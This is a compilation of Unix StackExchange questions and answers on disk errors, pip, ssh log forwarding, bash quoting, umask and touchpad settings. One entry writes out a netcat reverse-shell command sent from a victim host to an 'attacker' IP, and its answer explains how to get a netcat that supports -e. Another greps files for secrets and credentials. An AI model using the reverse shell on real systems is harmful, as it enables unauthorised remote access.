[15404.915944] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.915949] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00
[15404.915953] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0
[15404.915959] Buffer I/O error on dev sdc, logical block 1, async page read
[15404.915963] Buffer I/O error on dev sdc, logical block 2, async page read
[15404.915966] Buffer I/O error on dev sdc, logical block 3, async page read
[15404.917683] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.917686] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.917689] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.917692] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00
[15404.917694] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0
[15404.917698] Buffer I/O error on dev sdc, logical block 0, async page read
[15404.919186] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.919189] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.919192] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.919195] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00
[15404.919197] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0
[15404.919200] Buffer I/O error on dev sdc, logical block 1, async page read
[15404.919203] Buffer I/O error on dev sdc, logical block 2, async page read
[15404.919205] Buffer I/O error on dev sdc, logical block 3, async page read
[15404.920932] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.920935] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.920937] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.920940] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00
[15404.920942] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0
[15404.920945] Buffer I/O error on dev sdc, logical block 0, async page read
[15404.922433] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.922436] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.922438] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.922440] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00
[15404.922442] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0
[15404.922445] Buffer I/O error on dev sdc, logical block 1, async page read
[15404.923930] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.923932] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.923934] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.923936] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00
[15404.923938] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0
[15404.925438] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.925442] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.925446] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.925449] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00
[15404.925453] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0
[15404.925481] ldm_validate_partition_table(): Disk read failed.
[15404.927181] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s
[15404.927185] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current]
[15404.927189] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error
[15404.927192] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00
[15404.927195] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0
[15404.937694] Dev sdc: unable to read RDB block 0
[15404.945196] sdc: unable to read partition table

OS: Debian 10 (Bullseye) with kernel 5.5.13-2. smartctl output is:

smartctl 7.1 2019-12-30 r5022 [x86_64-linux-5.5.0-1-amd64] (local build)
Copyright (C) 2002-19, Bruce Allen, Christian Franke, www.smartmontools.org

=== START OF INFORMATION SECTION ===
Model Family:     Seagate Mobile HDD
Device Model:     ST2000LM007-1R8174
Serial Number:    WDZCWPT0LU
WWN Device Id:    5 000c50 0b926222d
Firmware Version: SBK2
User Capacity:    18,446,744,073,709,551,104 bytes [18446 PB]
Sector Size:      512 bytes logical/physical
Rotation Rate:    7200 rpm
Device is:        In smartctl database [for details use: -P show]
ATA Version is:   ATA8-ACS T13/1699-D revision 4
SATA Version is:  SATA 3.0, 6.0 Gb/s
Local Time is:    Mon Apr 27 18:21:43 2020 EDT
SMART support is: Available - device has SMART capability.
SMART support is: Enabled
Read SMART Data failed: scsi error aborted command

=== START OF READ SMART DATA SECTION ===
SMART Status command failed: scsi error aborted command
SMART overall-health self-assessment test result: UNKNOWN!
SMART Status, Attributes and Thresholds cannot be read.
Read SMART Log Directory failed: scsi error aborted command
Read SMART Error Log failed: scsi error aborted command
Read SMART Self-test Log failed: scsi error aborted command
Selective Self-tests/Logging not supported

Seagate Utilities information gives:

==========================================================================================
 SeaChest_SMART - Seagate drive utilities - NVMe Enabled
 Copyright (c) 2014-2019 Seagate Technology LLC and/or its Affiliates, All Rights Reserved
 SeaChest_SMART Version: 1.12.0-1_19_23 X86_64
 Build Date: Jun 10 2019
 Today: Mon Apr 27 18:07:59 2020
==========================================================================================

/dev/sg3 - BACKUP+ - 90CD8083BJBG - SCSI
	Vendor ID: Seagate
	Model Number: BACKUP+
	Serial Number: 90CD8083BJBG
	Firmware Revision: 0304
	World Wide Name: 5000000000000001
	Drive Capacity (PB/PiB): 144.12/128.00
	Temperature Data:
		Current Temperature (C): Not Reported
		Highest Temperature (C): Not Reported
		Lowest Temperature (C): Not Reported
	Power On Time: Not Reported
	Power On Hours: Not Reported
	MaxLBA: 281474976710653
	Native MaxLBA: Not Reported
	Logical Sector Size (B): 512
	Physical Sector Size (B): 512
	Sector Alignment: 0
	Rotation Rate (RPM): Not Reported
	Form Factor: Not Reported
	Last DST information: Not supported
	Long Drive Self Test Time: Not Supported
	Interface speed: Not Reported
	Annualized Workload Rate (TB/yr): Not Reported
	Total Bytes Read (B): Not Reported
	Total Bytes Written (B): Not Reported
	Encryption Support: Not Supported
	Cache Size (MiB): Not Reported
	Read Look-Ahead: Enabled
	Write Cache: Enabled
	SMART Status: Unknown or Not Supported
	ATA Security Information: Not Supported
	Firmware Download Support: Full, Segmented
	Specifications Supported:
		SPC-4
		SBC-3
		UAS
	SPC-4 Features Supported:
		Power Conditions [Enabled]
		Informational Exceptions [Mode 0]
Based on your smartctl output, the problem isn't that the physical storage of the drive has failed; instead, the fact that it can't even correctly report the size (which should be "burned in" to the firmware) suggests that the controller electronics at some point in the chain have failed. Most external USB hard disks have basic but not always advanced SMART support; Seagate drives have been known not to provide even the baseline expected support, so I'm not willing to say for certain that the SMART failures are a result of the controller failure. However, the inaccurately reported size indicates that's what happened. If this is an "all-in-one" external drive, you might be able to recover the data by removing the actual hard disk and connecting it to a standalone USB-HD adapter. (This would be the case if the failure is in the USB interface electronics and not the onboard drive electronics.) If that doesn't work and you get similar errors, your data may be recoverable if you send it to a recovery lab, although this tends to be very expensive and only worthwhile if you have something like priceless family photos or a valuable Bitcoin wallet.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582949", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409130/" ] }
582,961
I'm trying to install opencv with pip3 on my Devuan GNU/Linux 3, and this is what happens:

$ pip3 install opencv
Collecting opencv
Could not install packages due to an EnvironmentError: 404 Client Error: Not Found for url: https://pypi.org/simple/opencv

and indeed, if you browse that URL, you get a 404 page. Why is this happening? Am I to blame? Devuan? pypi.org administrators? Somebody else? Also - can I replace the URL somehow? Or manually install from somewhere?
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582961", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34868/" ] }
582,967
We are currently running a command on a Linux box that we have little control over. The command tails a log file, piping the results to an outbound SSH connection to our server, redirecting the output to a file. The command we use to do this is:

sh -c tail -f /var/log/x/a.log | ssh [email protected] -T 'cat - > /media/z/logs/a.log'

We are then able to perform additional processing of the captured log segment. However, we now need the ability to forward the streaming output of an additional log file using the same ssh connection. Doing

sh -c tail -f /var/log/x/a.log /var/log/x/b.log | ssh [email protected] -T 'cat - > /media/z/logs/a.log'

works, but it combines the two log files into one (with a header appearing before each line saying which file it came from). We need the output to be two different files, but we are limited to a single outbound SSH connection from the log server to our server. We do not have sudo or admin rights on the log server and are not able to get any software that would require it installed. If it matters, the remote log server is running CentOS and our server is running Ubuntu. Is there a way to split the output into two files? Or some other method of running multiple commands in parallel over the reverse SSH connection?
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582967", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/298767/" ] }
582,974
I have backup files created daily, each in its own directory:

2020-04-01
2020-04-02
2020-04-03

and so on. How can I write a script to delete the older directories and their contents? I have the code below so far; it deletes the directory, but it's not smart enough, because if I copy files in the directory to another directory the modified date will change:

find ~/delete/* -type d -ctime +6 -exec rm -rf {} \;
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582974", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409147/" ] }
583,064
#!/usr/bin/env bash
set -euo pipefail

if [ -z "$BUILD_DATE" ]; then
	export BUILD_DATE="$(date +%s%N)"
	echo "???"
else
	echo "!!!!!!!"
fi

The above does not output anything as it runs into an error: env/local-testing.sh:22: BUILD_DATE: parameter not set . Is there an alternative to running set +u and set -u again surrounding this conditional?
If you're running under set -u and have a variable that might be unset, and you need to test whether it's empty with the -z test, then you can use

if [ -z "${BUILD_DATE:-}" ]; then

The "${BUILD_DATE:-}" would expand to an empty string if the BUILD_DATE variable is empty or unset.
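For completeness, a small sketch of the two closely related expansions under set -u (the :- form treats set-but-empty the same as unset, while the - form only guards against unset):

set -u
unset BUILD_DATE
echo "${BUILD_DATE-}"     # OK: empty because BUILD_DATE is unset
echo "${BUILD_DATE:-}"    # OK: empty when unset *or* set but empty
echo "$BUILD_DATE"        # error: BUILD_DATE: unbound variable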
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583064", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/124109/" ] }
583,156
How do you get the first file in a directory in bash? First being what the shell glob finds first. My search for getting the first file in a directory in bash brought me to an old post with a very specific request. I'd like to document my solution to the general question for posterity, and make a place for people to put alternative solutions they'd like to share.
To get the first file in the current dir you can put the expansion in an array and grab the first element:

files=(*)
echo "${files[0]}"
# OR
echo "$files"    # since we are only concerned with the first element

Assuming your current dir contains multiple dirs, you can loop through and grab the first file in each like so:

for dir in *; do
    files=($dir/*)
    echo "${files[0]}"
done

But be aware that, depending on your shell settings, files=(*) may return an array of one element (that is '*') if there are no files. So you have to check that the file names in the array correspond to files which actually exist (and bear in mind that * is a valid file name).
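One way to sidestep that last caveat in bash is the nullglob option, which makes a non-matching glob expand to nothing; a sketch:

shopt -s nullglob
files=(*)
if (( ${#files[@]} > 0 )); then
    echo "first file: ${files[0]}"
else
    echo "no files here"
fi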
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583156", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409331/" ] }
583,296
Is it "user mask" or something? Wikipedia does not have details, but says the feature has been in Unix since 1978. POSIX just says it is the "file mode creation mask".
There's a long-standing explanation, exemplified by this entry in Wolfram Rosler's list , that it means "user". That entry was submitted in 2000, and attributes it to the fact that the "umask" set a U_cmask field in the process' " u area". This is a somewhat dubious explanation, the doubt acknowledged in the original by it being put in the form of a question, because there are several other things in the " u area", all of whose fields were conventionally named u_ something, that are not set by system calls beginning with "u". It is possible that it is a rationalization two decades after the fact. That the "u" stands for "user" is, on the other hand, widely accepted nowadays, and was widely accepted back in 2000, even though the " u area" explanation for that is dubious. Books about UNIX have described the umask as the "user file creation mask" since the late 1980s (although none of them make any mention of the " u area"). It's described that way in the printed manuals for AT&T Unix System 5 Release 3. It's described that way in the 1989 X/Open Portability Guide . It's described that way in Peter Norton's 1991 Guide to Unix . Simson Garfinkel's and Gene Spafford's 1991 Practical UNIX Security outright says

umask (UNIX shorthand for "user file-creation mode mask")

The problem is that the word "user" in the expansion of the name doesn't occur in works before 1985. The earliest that I have been able to find is Rebecca Thomas' 1985 A user guide to the UNIX system , followed by " umask (user mask)" in the Andersons' 1986 The UNIX C Shell Field Guide . Stephen R. Bourne's 1983 The UNIX System has a collection of manual entries for 7th Edition UNIX. The one for the umask() system call on page 294 does not contain the word "user" anywhere, just calling it a "file creation mode mask". The one for sh makes no mention of the subject at all. The 1983 Unix Time-Sharing System: Unix Programmer's Manual from Bell Labs repeats Bourne's wording (which is to be expected):

NAME
    umask — set file creation mode mask
SYNOPSIS
    umask(complmode)
DESCRIPTION
    Umask sets a mask used whenever a file is created by creat (T) or mknod (2): […]

On the BSD side of the universe, the 1987 UNIX Programmer's Reference Manual (PRM): 4.3 Berkeley Software Distribution, Virtual VAX-11 Version also makes no mention of the word "user":

NAME
    umask — set file creation mode mask
SYNOPSIS
    oumask = umask(numask)
    int oumask, numask;
DESCRIPTION
    Umask sets the process's file mode creation mask to numask and returns the previous value of the mask. […]

There's no "user" in Marc J. Rochkind's 1985 Advanced UNIX programming , just "file mode creation mask". Nor in the Waite Group's 1987 Unix System V Bible ("file-creation mask"). It has been widely accepted for the better part of 4 decades that the "u" stands for "user"; but it's hard to trace that back to the initial coinage of the name, the linkage to the " u area" only appears two decades after the fact, the word "user" seems to have appeared at some point between 7th Edition UNIX and AT&T Unix System 5 Release 3, and that word may have been introduced after the fact as a seemingly reasonable expansion for "u" by people writing formal doco.

Further reading: So what was the "u area" in UNIX?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583296", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/169677/" ] }
583,371
The touchpad on my laptop is a poor design, because it doesn't recede down into its housing to avoid my thenar and hypothenar's proclivity for inadvertent tap-to-clicks. In Ubuntu 19.10, using this same laptop, I was able to toggle off "Tap to Click", as shown here . However, in Kubuntu 20.04, this option is grayed out (disabled), and cannot be toggled: Is there another way that I might disable tap-to-click, given that the GUI isn't offering the ability to toggle this setting?
Reference: https://askubuntu.com/questions/1179275/enable-tap-to-click-kubuntu

I had to add Option "Tapping" "True" to the entry MatchIsTouchpad in the file /usr/share/X11/xorg.conf.d/40-libinput.conf . The exact name of the file might be different for other people. In the end, the relevant section will look something like this:

Section "InputClass"
        Identifier "libinput touchpad catchall"
        MatchIsTouchpad "on"
        Option "Tapping" "True"
        MatchDevicePath "/dev/input/event*"
        Driver "libinput"
EndSection

You need to be root to edit the file, and you must reboot your system after the changes!
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583371", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/40149/" ] }
583,409
I would like to modify an i3blocks script (utility blocks for the i3 WM environment) that prints out the bandwidth in/out. In particular I would like to change the color of this instruction's output: echo -n " $INLABEL" using the color #9fbc00. How can I do that? Thanks
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583409", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409555/" ] }
583,413
Just like the title says, is this possible? Say I have a file named myfile.dat , rm isn't going to do the job, and if I don't have the ability to install wipe or shred or some other tool, can I securely erase this file "by myself"?
Even with such tools, whether such a method of secure erasing works depends on the underlying filesystem. If you are using a modern copy-on-write based filesystem, these tools will not work at all, since they would not write to the previous blocks used by the file. If you want to do secure erasing, you would either need support for that feature built into the filesystem, or the filesystem would need to implement an interface that allows retrieving the disk block numbers for a file. The latter method, however, is a security risk and can only be supported for a privileged user.
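With those caveats firmly in mind, a best-effort, do-it-yourself overwrite on a traditional in-place filesystem (ext4 and the like) can be sketched as follows; this is of little value on copy-on-write filesystems or SSDs with wear levelling, and it assumes GNU stat and dd:

f=myfile.dat
size=$(stat -c %s "$f")
# overwrite the file's blocks in place with random data
# (count rounds up to a block boundary, which is fine for a wipe)
dd if=/dev/urandom of="$f" bs=4096 \
   count=$(( (size + 4095) / 4096 )) conv=notrunc,fsync
rm -f "$f"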
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583413", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/285444/" ] }
583,428
I'm sure some version of this question has been asked and answered before, but I've looked around and haven't found the exact answer. Perhaps someone here can help the lightbulb go on for me. I'm on a Mac with Mojave 10.14.6 and bash 3.2.57(1)-release. I'm learning the basics of regular expressions by following along with an online tutorial, and practicing both on the online site https://regexr.com , and by using grep in bash on my local machine. I'm practicing with a small text file (called small.txt) with three things in it:

9.00
9-00
9500

I understand that the . wildcard will match any one character at that spot. So, in the online regex engine (JavaScript) that I'm using, /9.00/g will match all three strings 9.00 , 9-00 and 9500 . It's the same if I use grep on the command line:

~/bin $ grep 9.00 small.txt
9.00
9-00
9500

So far, so good. The tutorial says that to turn the . from a metacharacter into a literal, you have to escape it. Okay, so putting /9\.00/g into the online regex box will only match 9.00 , as expected, not 9-00 nor 9500. Great. However, if I enter that same syntax into grep on the command line, I get an unexpected result:

~/bin $ grep 9\.00 small.txt
9.00
9-00
9500

Same as before. To get grep to work, I either have to double quote the whole string:

~/bin $ grep "9\.00" small.txt
9.00

or just double quote the escaped character:

~/bin $ grep 9"\."00 small.txt
9.00

There may well be some other quoting choices that I could make that would also give me the correct result. This is making it hard for me to wrap my head around the basics of regular expressions, because, clearly, I first have to understand how grep in the shell differs from traditional regular expression syntax. It's hard enough learning all of the rules for regular expressions, but when you add in the differences between classic regular expressions and the behavior of the bash shell, my head explodes. Anyway, wondering if there is a clear explanation that will clear this up for me and set me on the path to properly learning regular expressions that I can use with grep on the command line. (None of the courses on regular expressions point out the differences between the command line version of grep with bash, and the "pure" regular expression syntax that you see on the online regex testers.) I know that there are differences between engines at the advanced level, but this seems to be something so basic that I feel I must be missing something. Thanks.
Why? Because your shell interprets some special characters, such as \ in your example. You are running into trouble because you do not protect the string that you try to pass as an argument to grep via the shell. Several solutions: single-quoting the string, double-quoting the string (with double-quoting the shell will interpret several things, such as $variables , before sending the resulting string to the command), or not using quoting at all (which I strongly advise against) but adding backslashes in the right places to prevent the shell from interpreting the next characters before sending them to the command. I recommend protecting the string with single quotes, as that keeps almost everything literal:

grep '9\.0'    # send those 4 characters to grep in a single argument

The shell passes the single-quoted string literally. Note: The only thing you can't include inside a single-quoted shell string is a single quote (as this ends the single-quoting). To include a single quote inside a single-quoted shell string, you need to first end the single-quoting, immediately add an escaped single quote \' (or one between double quotes: "'" ), and then immediately re-enter the single-quoting to continue the single-quoted string. For example, to have the shell execute the command grep a'b , you could write the parameter as 'a'\''b' so that the shell sends a'b to grep; so write: grep 'a'\''b' , or grep 'a'"'"'b' . If you insist on not using quoting, you need to give your shell a \\ to have it send a \ to grep:

grep 9\\.0    # ie: a 9, a pair \\, a ., and a 0; the shell interprets the pair \\ as a literal \

If you use double quotes, you need to take into account that the shell will interpret several things first ( $vars , \ , etc). For example, when it sees an unescaped or unquoted \ , it waits for the next character to decide how to interpret it: \w is seen as a single letter w , \\ is seen as a single letter \ , etc.

grep "9\\.0"   # looks here the same as not quoting at all...
               # but doublequoting allows you to have spaces, etc, inside the string
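A quick way to see exactly what the shell hands to a command under each quoting style is to let printf echo the arguments back:

$ printf '%s\n' 9\.00 "9\.00" '9\.00'
9.00
9\.00
9\.00

The unquoted form loses the backslash (so grep sees the "match anything" dot again), while both quoted forms deliver 9\.00 intact.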
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583428", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408739/" ] }
583,461
Say I have a simple Node.js server like:

const http = require('http');
const server = http.createServer((req, res) => res.end('foobar'));
server.listen(3000, () => {
  console.log(JSON.stringify({"listening": 3000}));
});

and then with bash:

#!/usr/bin/env bash
node server.js | while read line; do
  if [[ "$line" == '{"listening":3000}' ]]; then
    :
  fi
done
# here I want to process more crap

my goal is to only continue the script after the server has started actually listening for requests. The best thing I can come up with is this:

#!/usr/bin/env bash
mkfifo foo
mkfifo bar

(node server.js &> foo) &

(while true; do
  cat foo | while read line; do
    if [[ "$line" != '{"listening":3000}' ]]; then
      echo "$line"
      continue;
    fi
    echo "ready" > bar
  done
done) &

cat bar && {
  # do my thing here?
}

Is there a less verbose/simpler way to do this? I just want to proceed only when the server is ready, and the only good way I know of doing that is to use stdout to print a message and listen for that.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583461", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
583,473
I am trying to get a shell on a host machine from another (attacker) machine. The attacker machine is listening. I am running the command below on my host machine:

nc 123.123.123.12 4444 -e /bin/sh

Output I get:

nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
          [-m minttl] [-O length] [-P proxy_username] [-p source_port]
          [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit]
          [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
          [destination] [port]
There are multiple variants of netcat. Install the version of netcat developed by nmap.org. On my Ubuntu system, there are two packages, netcat and ncat . The one from nmap is ncat and supports the -e option. The other one does not. You need to find the right package for your distribution. EDIT: On Kali Linux (2022.3), the packages netcat-openbsd and netcat-traditional will install the netcat version without the -e option. If you want the one with the -e option, install the package ncat . After installing ncat , the binary to launch will be /usr/bin/ncat
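With ncat installed on both ends, the setup from the question would look roughly like this (IP and port taken from the question; adjust to taste):

# on the attacker machine (listener):
ncat -l -v 4444
# on the host machine (connects back and hands over a shell):
ncat 123.123.123.12 4444 -e /bin/sh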
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583473", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409619/" ] }
583,519
I want to disable compression of the /boot/initrd.img file to boot a bit faster. My disk is large enough to accommodate the extra 10 MB. To be honest, I think that should be the default; who can't afford some megabytes of disk space nowadays? For embedded scenarios, it could be manually enabled. Looking into /etc/initramfs-tools/initramfs.conf , there are options to change the compression type

COMPRESS: [ gzip | bzip2 | lz4 | lzma | lzop | xz ]

but no option to disable compression. I tried None and none , no effect. As a workaround I manually decompress initrd.img-4.19.0-8-amd64 using gunzip . But each time a kernel update is installed I have to decompress it again.
There’s no option provided to do this, but since mkinitramfs is a shell script, one can be added without needing to recompile. In /usr/sbin/mkinitramfs , look for case "${compress}" in Add a “cat” line in the set of options: cat) compress="cat" ;; This will allow COMPRESS=cat to be specified in initramfs.conf . You will have to re-do this every time mkinitramfs is restored from the package (on upgrade).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583519", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/276189/" ] }
583,534
So I have a program (say, programA ), that will give me an output, for example: yes , no , maybe , probably , possibly , impossible , banana . I want to make a script that will do something, whatever it is, based on that output. Let's say I only need to account for yes , maybe and banana . So far what I would do is use case like so:

case $program_output in
    yes) echo "good word: $program_output" ;;
    maybe) echo "good word: $program_output" ;;
    banana) echo "good word: $program_output" ;;
    *) echo "bad word: $program_output" ;;
esac

But recently I was fiddling with the if statement, and found out I can do this faster like so:

if [[ "yesmaybebanana" =~ ${program_output} ]]; then
    echo "good word: ${program_output}";
else
    echo "bad word: ${program_output}";
fi

Is there any reason why I should not use the if statement for this? This is a case where $program_output cannot have spaces in it, and it's a limited list of words it can output.
The if version is not going to be as reliable as case here, because it will catch all substrings of yesmaybebanana - it will match for b , bebana etc:

#!/usr/bin/env bash
program_output='bebana'
if [[ "yesmaybebanana" =~ ${program_output} ]]; then
    echo "good word: ${program_output}";
else
    echo "bad word: ${program_output}";
fi

Output:

good word: bebana

And it's not portable - try running it with dash:

$ dash ./a.sh
./a.sh: 6: ./a.sh: [[: not found
bad word: bebana

You can significantly simplify your case version by using multiple words in a single line:

case $program_output in
    yes | maybe | banana) echo "good word: $program_output" ;;
    *) echo "bad word: $program_output" ;;
esac
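If you do want to keep the =~ test in bash, the substring problem can be avoided by anchoring the pattern on both sides, so only the whole words match; a sketch:

if [[ $program_output =~ ^(yes|maybe|banana)$ ]]; then
    echo "good word: $program_output"
else
    echo "bad word: $program_output"
fi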
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583534", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409671/" ] }
583,782
I did google this topic and all results are talking about <<EOF . But I saw scripts using <<-EOF , and I cannot find it anywhere by googling. Thus: what is the difference between <<-EOF and <<EOF in a bash script? Thanks a lot.
<<-EOF will ignore leading tabs in your heredoc, while <<EOF will not. Thus (the indentation below is tabs):

cat <<EOF
	Line 1
	Line 2
EOF

will produce

	Line 1
	Line 2

while

cat <<-EOF
	Line 1
	Line 2
EOF

produces

Line 1
Line 2
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583782", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/365713/" ] }
583,794
Can I create a peer-to-peer network using the IPv6 link-local address scope? I should be able to ping from System A to System B's link-local address (fe80 address space) and vice versa. In other words, I want to set up a peer-to-peer IPv6 network using explicitly defined link-local addresses. If yes, then any pointers to setting up the same in AWS would be very helpful.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583794", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/399648/" ] }
583,795
I want to match ids from file A with file B, and save the result in a third file with the columns that belong to both files. I have tried almost all awk solutions that I found, but somehow they don't work properly. I would appreciate your help!

fileA :

id;name
1;"sam"
4;"jon"

fileB :

id;surname
5;"smith"
1;"khon"

file3 :

id;name;surname
1;"sam";"khon"
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583795", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409944/" ] }
583,822
I am using Alpine Linux 3.11 as a new Docker container. I have the default $PATH variable, which reads:

echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

When I place a script, wait-for (which is a shell script starting with #!/bin/sh ) in /usr/local/bin it displays fine:

chmod +x wait-for
mv wait-for /usr/local/bin/wait-for
ls -l /usr/local/bin/wait-for

produces:

-rwxr-xr-x    1 root     root          1451 May  1 16:09 /usr/local/bin/wait-for

It also runs when I use sh /usr/local/bin/wait-for to execute it. However, when I am in /usr/src/ and I try to run wait-for I get

sh: wait-for: not found

My understanding is that because the /usr/local/bin directory is in $PATH , any script inside that directory should be callable globally. What have I misunderstood? I can run the file from /usr/src/ if I use sh /usr/local/bin/wait-for , but not if I use /usr/local/bin/wait-for (without the sh prefix), which returns sh: /usr/local/bin/wait-for: not found . The contents of /etc/fstab are:

/dev/cdrom	/media/cdrom	iso9660	noauto,ro 0 0
/dev/usbdisk	/media/usb	vfat	noauto,ro 0 0
Your interactive shell is dash (masquerading as sh). The dash shell says sh: /usr/local/bin/wait-for: not found when it tries to execute a script that has a faulty #!-line pointing to an interpreter that can't be found. It happens to be exactly the same error that you would get when the command that you type can't be found, so it's easy to think it's a $PATH issue (it's not in this case). Other shells have more informative error messages (bash and zsh say "bad interpreter: No such file or directory" and also tell you what interpreter they tried to execute). Since the file is a DOS text file, the #!-line instructs the shell to run the script with /bin/sh\r, where \r is a common representation of a carriage return character, which is part of the line termination in DOS text files. On a Unix system, a carriage return is an "ordinary character" and not at all part of the line termination, which means that it tries to start /bin/sh\r to run your script, and then fails as that file does not exist. It is therefore the interpreter that is "not found", not the script itself. Running the script with an explicit interpreter bypasses the #!-line, always, which is why you don't get the error when you do that. However, each line in the script would still have the carriage returns at the end of them, which may cause the script to malfunction under some conditions. Simply re-saving the file as a Unix text file, or converting it with dos2unix, would resolve your issue.
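A quick way to confirm and repair the line endings (a sketch; dos2unix may need to be installed separately):

file wait-for                 # DOS files are typically reported with "CRLF line terminators"
sed -i 's/\r$//' wait-for     # GNU sed: strip the trailing carriage returns in place
dos2unix wait-for             # equivalent, if the tool is available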
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583822", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/407043/" ] }
583,928
I want to have a bash script which: Runs the "strings" command on each file in current directory Searches the output of strings for each file for specific terms using grep I have the following, but the script output does not show any matches: #!/bin/bashecho "Searching files in directory for secrets and urls"for file in ./*do echo "=====$file=====" strings ${file} | egrep -wi --color 'secret\|password\|key\|credential|\http'done I've also tried strings $file | egrep -wi --color 'secret\|password\|key\|credential|\http' and eval "strings ${file} | egrep -wi --color 'secret\|password\|key\|credential|\http'" but these do not appear to work. The script outputs the filenames, but not the matches.
